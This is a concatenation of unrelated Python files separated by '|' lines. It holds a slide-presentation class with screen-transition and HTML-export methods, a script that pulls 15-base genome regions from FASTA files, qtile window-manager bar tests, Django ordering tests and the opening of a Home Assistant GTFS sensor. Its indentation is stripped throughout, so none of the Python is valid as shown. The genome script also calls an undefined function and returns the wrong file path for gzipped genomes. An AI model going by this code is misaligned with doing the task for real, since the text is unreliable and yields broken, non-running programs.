def animateRefresh( self, app ):
"""
Animate into the slide the initial animated objects, to be
called when the slide has first been refreshed.
"""
#
# Quick hack to make sure the canvas is painted before
# animating the objects in.
#
import time
time.sleep(1)
objects = self.getAnimatedRefresh()
while len(objects):
for obj in objects:
if self.animateAdvance(obj, app) == done:
objects.remove( obj )
def findAnimatedRefresh( self, contents ):
"""
"""
for content in contents:
if isinstance(content, PresentationObject) and \
not isinstance(content, waitevent):
try:
if content.isAnimated() and \
content.x() >= 0 and \
content.y() >= 0:
o = { "object" : content,
"origX" : content.x(),
"origY" : content.y() }
self.getAnimatedRefresh().append(o)
except AttributeError:
pass
self.findAnimatedRefresh( content.getContents() )
def getFontHeight( self ):
"""
Get the height of the tallest font on the current text line.
"""
return self.__fontHeight
def setFontHeight( self, fontHeight ):
"""
Set the height of the tallest font on the current text line.
"""
if fontHeight > self.getRenderHeight():
self.setRenderHeight( fontHeight )
elif fontHeight == 0:
self.setRenderHeight(0)
self.__fontHeight = fontHeight
def setRenderHeight( self, renderHeight ):
"""
Set the height of the tallest object on the current line.
"""
self.__renderHeight = renderHeight
def getRenderHeight( self ):
"""
Get the height of the tallest object on the current line.
"""
return self.__renderHeight
def getProperty( self, propertyName ):
"""
If a title doesn't exist for this slide, instead of searching
through parents up the tree, just return "no title".
"""
if propertyName == "title" and \
(not self.getProperties().has_key("title") or \
len(PresentationObject.getProperty(self, "title")) == 0):
return "(no title)"
else:
return PresentationObject.getProperty( self,
propertyName )
def makeTransition( self, canvasView ):
"""
Refresh the contents of a slide with a certain transition type.
canvasView, QCanvasView object
"""
#
# number of seconds between transition animation refreshes
#
refreshTimeout = self.getProperty( "transitiondelay" )
transition = self.getProperty( "transition" )
if transition == "blindleft":
for i in range(0, canvasView.width(), 8):
canvasView.repaintContents( i, 0, 8,
canvasView.height(), false )
sleep( refreshTimeout )
elif transition == "blindright":
for i in range(canvasView.width()-8, -1, -8):
canvasView.repaintContents( i, 0, 8,
canvasView.height(), false )
sleep( refreshTimeout )
elif transition == "blindtop":
for i in range(0, canvasView.height(), 8):
canvasView.repaintContents( 0, i,
canvasView.width(), 8, false )
sleep( refreshTimeout )
elif transition == "blindbottom":
for i in range(canvasView.height()-8, -1, -8):
canvasView.repaintContents( 0, i,
canvasView.width(), 8, false )
sleep( refreshTimeout )
elif transition == "center" or transition == "centre":
x = canvasView.width() / 2 - 4
y = canvasView.height() / 2 - 4
width = 8
height = 8
while width < canvasView.width() and \
height < canvasView.height():
canvasView.repaintContents( x, y,
width,
height,
false )
x = x - 4
y = y - 4
width = width + 8
height = height + 8
if x < 0:
x = 0
if y < 0:
y = 0
sleep( refreshTimeout )
elif transition == "spiral":
INITIAL_STEP = 64
REPAINT_STEP = INITIAL_STEP / 2
x = canvasView.getApp().getWidth()/2 - REPAINT_STEP
y = canvasView.getApp().getHeight()/2 - REPAINT_STEP
oldWidth = width = INITIAL_STEP
oldHeight = height = INITIAL_STEP
canvasView.repaintContents( x, y, width, height )
while width < canvasView.width() and \
height < canvasView.height():
x = x - REPAINT_STEP
y = y - REPAINT_STEP
width = REPAINT_STEP
height = oldHeight + REPAINT_STEP
canvasView.repaintContents( x, y,
width,
height )
sleep( refreshTimeout )
x = x + REPAINT_STEP
width = oldWidth + REPAINT_STEP
height = REPAINT_STEP
canvasView.repaintContents( x, y,
width,
height )
sleep( refreshTimeout )
x = x + oldWidth
y = y + REPAINT_STEP
width = REPAINT_STEP
height = oldHeight + REPAINT_STEP
canvasView.repaintContents( x, y,
width,
height )
sleep( refreshTimeout )
x = x - oldWidth - REPAINT_STEP
y = y + oldHeight
width = oldWidth + REPAINT_STEP
height = REPAINT_STEP
canvasView.repaintContents( x, y,
width,
height )
sleep( refreshTimeout )
y = y - oldHeight - REPAINT_STEP
width = oldWidth = oldWidth + INITIAL_STEP
height = oldHeight = oldHeight + INITIAL_STEP
elif transition == "dissolve":
b = 32 # block size to display at a time
for x in range(0, canvasView.width()):
for y in range(0, canvasView.height()):
if x % b == 0 and y % b == 0 and \
x%(b*2) == 0 and y%(b*2) == 0:
canvasView.repaintContents(
x, y,
b, b,
false )
for x in range(0, canvasView.width()):
for y in range(0, canvasView.height()):
if x % b == 0 and y % b == 0 and \
x%(b*2) != 0 and y%(b*2) != 0:
canvasView.repaintContents(
x, y,
b, b,
false )
for x in range(0, canvasView.width()):
for y in range(0, canvasView.height()):
if x % b == 0 and y % b == 0 and \
((x%(b*2) == 0 and y%(b*2) != 0) or \
(x%(b*2) != 0 and y%(b*2) == 0)):
canvasView.repaintContents(
x, y,
b, b,
false )
else:
canvasView.update()
def getHtml( self ):
"""
Get the HTML associated with this object.
Returns a list of html strings, with each entry being a line
in a html file.
"""
background = self.getProperty( "background" )
if background == None or len(background) == 0:
background = ""
else:
background = " background=\"%s\"" % background
bgcolor = self.getProperty( "bgcolor" )
if bgcolor == None:
bgcolor = ""
else:
bgcolor = " bgcolor=\"%s\"" % bgcolor
text = self.getProperty( "color" )
if text == None:
text = ""
else:
text = " text=\"%s\"" % text
title = self.getProperty( "title" )
if title == None or len(title) == 0:
title = ""
else:
title = " title=\"%s\"" % title
htmlList = [ "<body%s%s%s%s leftmargin=\"%s\" " \
"rightmargin=\"%s\" topmargin=\"%s\" " \
"bottommargin=\"%s\">" % ( background, \
bgcolor, text, title, \
self.getProperty("marginleft"), \
self.getProperty("marginright"), \
self.getProperty("margintop"), \
self.getProperty("marginbottom") ) ]
for content in self.getContents():
if isinstance(content, PresentationObject):
htmlList = htmlList + content.getHtml()
else:
htmlList = htmlList + [ content ]
htmlList = htmlList + [ "</body>\n" ]
return htmlList
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Take a list of genome positions and return a 15 base region (-7 to +7)
Created: 2017-03-20 16:21
Last modified: 2017-03-20 17:44
"""
import os
import bz2
import gzip
from datetime import timedelta as _td
import fyrd
import sys
import argparse
from Bio import SeqIO as seqio
hg19 = "/godot/genomes/human/hg19"
###############################################################################
# Core Algorithm #
###############################################################################
def get_regions(positions, genome_file, base=0, count=7):
"""Return a list of regions surrounding a position.
Will loop through each chromosome and search all positions in that
chromosome in one batch. Lookup is serial per chromosome.
Args:
positions (dict): Dictionary of {chrom->positons}
genome_file (str): Location of a genome fasta file or directory of
files. If directory, file names must be
<chrom_name>.fa[.gz]. Gzipped OK.
base (int): Either 0 or 1, base of positions in your list
count (int): Distance + and - the position to extract
Returns:
dict: {chrom->{postion->sequence}}
"""
# If genome file is a directory, use recursion! Because why not.
if os.path.isdir(genome_file):
chroms = positions.keys()
files = []
for chrom in chroms:
files.append(get_fasta_file(genome_file, chrom))
final = {}
for chrom, fl in zip(chroms, files):
final.update(
get_dinucleotides({chrom: positions[chrom]}, fl, base, count)
)
return final
done = []
results = {}
with open_zipped(genome_file) as fasta_file:
for chrom in seqio.parse(fasta_file, 'fasta'):
if chrom.id not in positions:
continue
else:
done.append(chrom.id)
results[chrom.id] = {}
for pos in positions[chrom.id]:
ps = pos-base # Correct base-1 positions here
region = seq(chrom[ps-count:ps+count+1])
results[chrom.id][pos] = region
if len(done) != len(positions.keys()):
print('The following chromosomes were not in files: {}'
.format([i for i in positions if i not in done]))
return results
###############################################################################
# Parallelization #
###############################################################################
def get_regions_parallel(positions, genome_file, base=0, count=7):
"""Return a list of regions surrounding a position.
Will loop through each chromosome and search all positions in that
chromosome in one batch. Lookup is serial per chromosome.
Args:
positions (dict): Dictionary of {chrom->positons}
genome_file (str): Location of a genome fasta file or directory of
files. If directory, file names must be
<chrom_name>.fa[.gz]. Gzipped OK.
base (int): Either 0 or 1, base of positions in your list
count (int): Distance + and - the position to extract
Returns:
dict: {chrom->{postion->sequence}}
"""
outs = []
for chrom in positions.keys():
if os.path.isdir(genome_file):
fa_file = get_fasta_file(genome_file, chrom)
if not os.path.isfile(fa_file):
raise FileNotFoundError('{} not found.'.format(genome_file))
mins = int(len(positions[chrom])/2000)+60
time = str(_td(minutes=mins))
outs.append(
fyrd.submit(
get_regions,
({chrom: positions[chrom]}, fa_file, base, count),
cores=1, mem='6GB', time=time,
)
)
final = {}
for out in outs:
final.update(out.get())
return final
###############################################################################
# Helper Functions #
###############################################################################
def seq(sequence):
"""Convert Bio.Seq object to string."""
return str(sequence.seq.upper())
def get_fasta_file(directory, name):
"""Look in directory for name.fa or name.fa.gz and return path."""
fa_file = os.path.join(directory, name + '.fa')
gz_file = fa_file + '.gz'
if os.path.isfile(fa_file):
genome_file = fa_file
elif os.path.isfile(gz_file):
genome_file = fa_file
else:
raise FileNotFoundError(
'No {f}.fa or {f}.fa.gz file found in {d}'.format(
f=name, d=directory
)
)
return genome_file
def open_zipped(infile, mode='r'):
""" Return file handle of file regardless of zipped or not
Text mode enforced for compatibility with python2 """
mode = mode[0] + 't'
p2mode = mode
if hasattr(infile, 'write'):
return infile
if isinstance(infile, str):
if infile.endswith('.gz'):
return gzip.open(infile, mode)
if infile.endswith('.bz2'):
if hasattr(bz2, 'open'):
return bz2.open(infile, mode)
else:
return bz2.BZ2File(infile, p2mode)
return open(infile, p2mode)
###############################################################################
# Run On Files #
###############################################################################
def parse_location_file(infile, base=None):
"""Get a compatible dictionary from an input file.
Args:
infile (str): Path to a bed, vcf, or tsv. If tsv should be chrom\\tpos.
Filetype detected by extension. Gzipped/B2zipped OK.
base (int): Force base of file, if not set, bed/tsv assumed base 0,
vcf assumed base-1
Returns:
dict: A dict of {chrom->pos}
"""
if not isinstance(base, int):
base = 1 if 'vcf' in infile.split('.') else 0
out = {}
for chrom, pos in tsv_bed_vcf(infile, base):
if chrom not in out:
out[chrom] = []
out[chrom].append(pos)
return out
def tsv_bed_vcf(infile, base=0):
"""Interator for generic tsv, yields column1, column2 for every line.
column1 is assumed to be string, column2 is converted to int and base is
subtracted from it.
"""
with open_zipped(infile) as fin:
for line in fin:
if line.startswith('#'):
continue
f = line.rstrip().split('\t')
yield f[0], int(f[1])-base
###############################################################################
# Run as a Script #
###############################################################################
DESC = """\
Get a region for every position in a given file.
Will write out one line for every line in your file, as::
chrom\\tposition\\tsequence
Parallelizes on the cluster if there is more than one chromosome.
"""
def get_parser():
"""Returns an argument parser."""
parser = argparse.ArgumentParser(
description=DESC,
formatter_class=argparse.RawDescriptionHelpFormatter)
# Positional arguments
parser.add_argument(
'location_file',
help="File of locations, bed, vcf, or just chrom\\tposition fine."
)
# Optional flags
parser.add_argument('-d', '--distance', default=7,
help="Distance up and downstream of position to get")
parser.add_argument('-g', '--genome', default=hg19,
help="Genome fasta/directory, defaults to hg19.")
parser.add_argument('-o', '--out', default=sys.stdout,
help="File to write to, default STDOUT.")
return parser
def main(argv=None):
"""Run using files, for running as a scipt."""
if not argv:
argv = sys.argv[1:]
# Get arguments
parser = get_parser()
args = parser.parse_args(argv)
locations = parse_location_file(args.location_file)
if len(locations) == 1:
results = get_regions(locations, args.genome, 0, args.distance)
else:
results = get_regions_parallel(locations, args.genome, 0,
args.distance)
s = '{}\t{}\t{}\n'
with open_zipped(args.out) as fout:
for chrom, positions in locations.items():
for position, sequence in positions.items():
fout.write(s.format(chrom, position, sequence))
if __name__ == '__main__' and '__file__' in globals():
sys.exit(main())
|
|
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2012-2013 Craig Barnes
# Copyright (c) 2012 roger
# Copyright (c) 2012, 2014-2015 Tycho Andersen
# Copyright (c) 2014 Sean Vig
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pytest
import six
import libqtile.layout
import libqtile.bar
import libqtile.widget
import libqtile.manager
import libqtile.config
import libqtile.confreader
class GBConfig(object):
auto_fullscreen = True
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("bb"),
libqtile.config.Group("ccc"),
libqtile.config.Group("dddd"),
libqtile.config.Group("Pppy")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.CPUGraph(
width=libqtile.bar.STRETCH,
type="linefill",
border_width=20,
margin_x=1,
margin_y=1
),
libqtile.widget.MemoryGraph(type="line"),
libqtile.widget.SwapGraph(type="box"),
libqtile.widget.TextBox(name="text",
background="333333"),
],
50,
),
bottom=libqtile.bar.Bar(
[
libqtile.widget.GroupBox(),
libqtile.widget.AGroupBox(),
libqtile.widget.Prompt(),
libqtile.widget.WindowName(),
libqtile.widget.Sep(),
libqtile.widget.Clock(),
],
50
),
# TODO: Add vertical bars and test widgets that support them
)
]
main = None
gb_config = pytest.mark.parametrize("qtile", [GBConfig], indirect=True)
def test_completion():
c = libqtile.widget.prompt.CommandCompleter(None, True)
c.reset()
c.lookup = [
("a", "x/a"),
("aa", "x/aa"),
]
assert c.complete("a") == "a"
assert c.actual() == "x/a"
assert c.complete("a") == "aa"
assert c.complete("a") == "a"
c = libqtile.widget.prompt.CommandCompleter(None)
r = c.complete("l")
assert c.actual().endswith(r)
c.reset()
assert c.complete("/bi") == "/bin/"
c.reset()
assert c.complete("/bin") != "/bin/"
c.reset()
assert c.complete("~") != "~"
c.reset()
s = "thisisatotallynonexistantpathforsure"
assert c.complete(s) == s
assert c.actual() == s
c.reset()
@gb_config
def test_draw(qtile):
qtile.testWindow("one")
b = qtile.c.bar["bottom"].info()
assert b["widgets"][0]["name"] == "groupbox"
@gb_config
def test_prompt(qtile):
assert qtile.c.widget["prompt"].info()["width"] == 0
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("a")
qtile.c.widget["prompt"].fake_keypress("Tab")
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("slash")
qtile.c.widget["prompt"].fake_keypress("Tab")
@gb_config
def test_event(qtile):
qtile.c.group["bb"].toscreen()
@gb_config
def test_textbox(qtile):
assert "text" in qtile.c.list_widgets()
s = "some text"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
s = "Aye, much longer string than the initial one"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
qtile.c.group["Pppy"].toscreen()
qtile.c.widget["text"].set_font(fontsize=12)
@gb_config
def test_textbox_errors(qtile):
qtile.c.widget["text"].update(None)
qtile.c.widget["text"].update("".join(chr(i) for i in range(255)))
qtile.c.widget["text"].update("V\xE2r\xE2na\xE7\xEE")
qtile.c.widget["text"].update(six.u("\ua000"))
@gb_config
def test_groupbox_button_press(qtile):
qtile.c.group["ccc"].toscreen()
assert qtile.c.groups()["a"]["screen"] is None
qtile.c.bar["bottom"].fake_button_press(0, "bottom", 10, 10, 1)
assert qtile.c.groups()["a"]["screen"] == 0
class GeomConf(object):
auto_fullscreen = False
main = None
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("b"),
libqtile.config.Group("c"),
libqtile.config.Group("d")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar([], 10),
bottom=libqtile.bar.Bar([], 10),
left=libqtile.bar.Bar([], 10),
right=libqtile.bar.Bar([], 10),
)
]
geom_config = pytest.mark.parametrize("qtile", [GeomConf], indirect=True)
class DBarH(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = True
class DBarV(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = False
class DWidget(object):
def __init__(self, length, length_type):
self.length, self.length_type = length, length_type
@geom_config
def test_geometry(qtile):
qtile.testXeyes()
g = qtile.c.screens()[0]["gaps"]
assert g["top"] == (0, 0, 800, 10)
assert g["bottom"] == (0, 590, 800, 10)
assert g["left"] == (0, 10, 10, 580)
assert g["right"] == (790, 10, 10, 580)
assert len(qtile.c.windows()) == 1
geom = qtile.c.windows()[0]
assert geom["x"] == 10
assert geom["y"] == 10
assert geom["width"] == 778
assert geom["height"] == 578
internal = qtile.c.internal_windows()
assert len(internal) == 4
wid = qtile.c.bar["bottom"].info()["window"]
assert qtile.c.window[wid].inspect()
@geom_config
def test_resize(qtile):
def wd(l):
return [i.length for i in l]
def offx(l):
return [i.offsetx for i in l]
def offy(l):
return [i.offsety for i in l]
for DBar, off in ((DBarH, offx), (DBarV, offy)):
b = DBar([], 100)
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 40, 40, 10]
assert off(dwidget_list) == [0, 10, 50, 90]
b._resize(101, dwidget_list)
assert wd(dwidget_list) == [10, 40, 41, 10]
assert off(dwidget_list) == [0, 10, 50, 91]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10]
assert off(dwidget_list) == [0]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 90]
assert off(dwidget_list) == [0, 10]
dwidget_list = [
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [90, 10]
assert off(dwidget_list) == [0, 90]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 80, 10]
assert off(dwidget_list) == [0, 10, 90]
class ExampleWidget(libqtile.widget.base._Widget):
orientations = libqtile.widget.base.ORIENTATION_HORIZONTAL
def __init__(self):
libqtile.widget.base._Widget.__init__(self, 10)
def draw(self):
pass
class IncompatibleWidgetConf(object):
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
left=libqtile.bar.Bar(
[
# This widget doesn't support vertical orientation
ExampleWidget(),
],
10
),
)
]
def test_incompatible_widget(qtile_nospawn):
config = IncompatibleWidgetConf
# Ensure that adding a widget that doesn't support the orientation of the
# bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
class MultiStretchConf(object):
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
),
)
]
def test_multiple_stretches(qtile_nospawn):
config = MultiStretchConf
# Ensure that adding two STRETCH widgets to the same bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
def test_basic(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
assert i["widgets"][1]["width"] == 780
assert i["widgets"][2]["offset"] == 790
libqtile.hook.clear()
def test_singlespacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][0]["width"] == 800
libqtile.hook.clear()
def test_nospacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
libqtile.hook.clear()
|
|
from __future__ import unicode_literals
from datetime import datetime
from operator import attrgetter
from django.db.models import F
from django.db.models.functions import Upper
from django.test import TestCase
from .models import Article, Author, Reference
class OrderingTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.a1 = Article.objects.create(headline="Article 1", pub_date=datetime(2005, 7, 26))
cls.a2 = Article.objects.create(headline="Article 2", pub_date=datetime(2005, 7, 27))
cls.a3 = Article.objects.create(headline="Article 3", pub_date=datetime(2005, 7, 27))
cls.a4 = Article.objects.create(headline="Article 4", pub_date=datetime(2005, 7, 28))
cls.author_1 = Author.objects.create(name="Name 1")
cls.author_2 = Author.objects.create(name="Name 2")
for i in range(2):
Author.objects.create()
def test_default_ordering(self):
"""
By default, Article.objects.all() orders by pub_date descending, then
headline ascending.
"""
self.assertQuerysetEqual(
Article.objects.all(), [
"Article 4",
"Article 2",
"Article 3",
"Article 1",
],
attrgetter("headline")
)
# Getting a single item should work too:
self.assertEqual(Article.objects.all()[0], self.a4)
def test_default_ordering_override(self):
"""
Override ordering with order_by, which is in the same format as the
ordering attribute in models.
"""
self.assertQuerysetEqual(
Article.objects.order_by("headline"), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.order_by("pub_date", "-headline"), [
"Article 1",
"Article 3",
"Article 2",
"Article 4",
],
attrgetter("headline")
)
def test_order_by_override(self):
"""
Only the last order_by has any effect (since they each override any
previous ordering).
"""
self.assertQuerysetEqual(
Article.objects.order_by("id"), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.order_by("id").order_by("-headline"), [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_order_by_nulls_first_and_last(self):
msg = "nulls_first and nulls_last are mutually exclusive"
with self.assertRaisesMessage(ValueError, msg):
Article.objects.order_by(F("author").desc(nulls_last=True, nulls_first=True))
def test_order_by_nulls_last(self):
Article.objects.filter(headline="Article 3").update(author=self.author_1)
Article.objects.filter(headline="Article 4").update(author=self.author_2)
# asc and desc are chainable with nulls_last.
self.assertSequenceEqual(
Article.objects.order_by(F("author").desc(nulls_last=True)),
[self.a4, self.a3, self.a1, self.a2],
)
self.assertSequenceEqual(
Article.objects.order_by(F("author").asc(nulls_last=True)),
[self.a3, self.a4, self.a1, self.a2],
)
self.assertSequenceEqual(
Article.objects.order_by(Upper("author__name").desc(nulls_last=True)),
[self.a4, self.a3, self.a1, self.a2],
)
self.assertSequenceEqual(
Article.objects.order_by(Upper("author__name").asc(nulls_last=True)),
[self.a3, self.a4, self.a1, self.a2],
)
def test_order_by_nulls_first(self):
Article.objects.filter(headline="Article 3").update(author=self.author_1)
Article.objects.filter(headline="Article 4").update(author=self.author_2)
# asc and desc are chainable with nulls_first.
self.assertSequenceEqual(
Article.objects.order_by(F("author").asc(nulls_first=True)),
[self.a1, self.a2, self.a3, self.a4],
)
self.assertSequenceEqual(
Article.objects.order_by(F("author").desc(nulls_first=True)),
[self.a1, self.a2, self.a4, self.a3],
)
self.assertSequenceEqual(
Article.objects.order_by(Upper("author__name").asc(nulls_first=True)),
[self.a1, self.a2, self.a3, self.a4],
)
self.assertSequenceEqual(
Article.objects.order_by(Upper("author__name").desc(nulls_first=True)),
[self.a1, self.a2, self.a4, self.a3],
)
def test_stop_slicing(self):
"""
Use the 'stop' part of slicing notation to limit the results.
"""
self.assertQuerysetEqual(
Article.objects.order_by("headline")[:2], [
"Article 1",
"Article 2",
],
attrgetter("headline")
)
def test_stop_start_slicing(self):
"""
Use the 'stop' and 'start' parts of slicing notation to offset the
result list.
"""
self.assertQuerysetEqual(
Article.objects.order_by("headline")[1:3], [
"Article 2",
"Article 3",
],
attrgetter("headline")
)
def test_random_ordering(self):
"""
Use '?' to order randomly.
"""
self.assertEqual(
len(list(Article.objects.order_by("?"))), 4
)
def test_reversed_ordering(self):
"""
Ordering can be reversed using the reverse() method on a queryset.
This allows you to extract things like "the last two items" (reverse
and then take the first two).
"""
self.assertQuerysetEqual(
Article.objects.all().reverse()[:2], [
"Article 1",
"Article 3",
],
attrgetter("headline")
)
def test_reverse_ordering_pure(self):
qs1 = Article.objects.order_by(F('headline').asc())
qs2 = qs1.reverse()
self.assertQuerysetEqual(
qs1, [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
qs2, [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_extra_ordering(self):
"""
Ordering can be based on fields included from an 'extra' clause
"""
self.assertQuerysetEqual(
Article.objects.extra(select={"foo": "pub_date"}, order_by=["foo", "headline"]), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
def test_extra_ordering_quoting(self):
"""
If the extra clause uses an SQL keyword for a name, it will be
protected by quoting.
"""
self.assertQuerysetEqual(
Article.objects.extra(select={"order": "pub_date"}, order_by=["order", "headline"]), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
def test_extra_ordering_with_table_name(self):
self.assertQuerysetEqual(
Article.objects.extra(order_by=['ordering_article.headline']), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.extra(order_by=['-ordering_article.headline']), [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_order_by_pk(self):
"""
'pk' works as an ordering option in Meta.
"""
self.assertQuerysetEqual(
Author.objects.all(),
list(reversed(range(1, Author.objects.count() + 1))),
attrgetter("pk"),
)
def test_order_by_fk_attname(self):
"""
ordering by a foreign key by its attribute name prevents the query
from inheriting its related model ordering option (#19195).
"""
for i in range(1, 5):
author = Author.objects.get(pk=i)
article = getattr(self, "a%d" % (5 - i))
article.author = author
article.save(update_fields={'author'})
self.assertQuerysetEqual(
Article.objects.order_by('author_id'), [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_order_by_f_expression(self):
self.assertQuerysetEqual(
Article.objects.order_by(F('headline')), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.order_by(F('headline').asc()), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.order_by(F('headline').desc()), [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_order_by_f_expression_duplicates(self):
"""
A column may only be included once (the first occurrence) so we check
to ensure there are no duplicates by inspecting the SQL.
"""
qs = Article.objects.order_by(F('headline').asc(), F('headline').desc())
sql = str(qs.query).upper()
fragment = sql[sql.find('ORDER BY'):]
self.assertEqual(fragment.count('HEADLINE'), 1)
self.assertQuerysetEqual(
qs, [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
qs = Article.objects.order_by(F('headline').desc(), F('headline').asc())
sql = str(qs.query).upper()
fragment = sql[sql.find('ORDER BY'):]
self.assertEqual(fragment.count('HEADLINE'), 1)
self.assertQuerysetEqual(
qs, [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_related_ordering_duplicate_table_reference(self):
"""
An ordering referencing a model with an ordering referencing a model
multiple time no circular reference should be detected (#24654).
"""
first_author = Author.objects.create()
second_author = Author.objects.create()
self.a1.author = first_author
self.a1.second_author = second_author
self.a1.save()
self.a2.author = second_author
self.a2.second_author = first_author
self.a2.save()
r1 = Reference.objects.create(article_id=self.a1.pk)
r2 = Reference.objects.create(article_id=self.a2.pk)
self.assertSequenceEqual(Reference.objects.all(), [r2, r1])
|
|
"""Support for GTFS (Google/General Transport Format Schema)."""
import datetime
import logging
import os
import threading
from typing import Any, Callable, Optional
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION, CONF_NAME, CONF_OFFSET, DEVICE_CLASS_TIMESTAMP,
STATE_UNKNOWN)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
from homeassistant.util import slugify
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
ATTR_ARRIVAL = 'arrival'
ATTR_BICYCLE = 'trip_bikes_allowed_state'
ATTR_DAY = 'day'
ATTR_FIRST = 'first'
ATTR_DROP_OFF_DESTINATION = 'destination_stop_drop_off_type_state'
